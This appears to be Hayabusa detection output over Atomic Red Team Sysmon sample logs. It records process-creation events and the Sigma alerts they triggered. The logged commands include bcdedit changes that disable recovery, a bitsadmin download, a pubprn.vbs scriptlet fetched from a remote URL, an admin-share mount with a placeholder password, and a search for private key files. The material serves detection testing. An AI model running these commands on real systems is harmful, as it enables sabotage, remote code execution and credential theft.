+09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: 
C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.816 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry 
Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 
747F3D96-D81D-5D31-0000-0010B8CA2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 
747F3D96-D824-5D31-0000-001075F62B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" 
/c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via 
BITS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
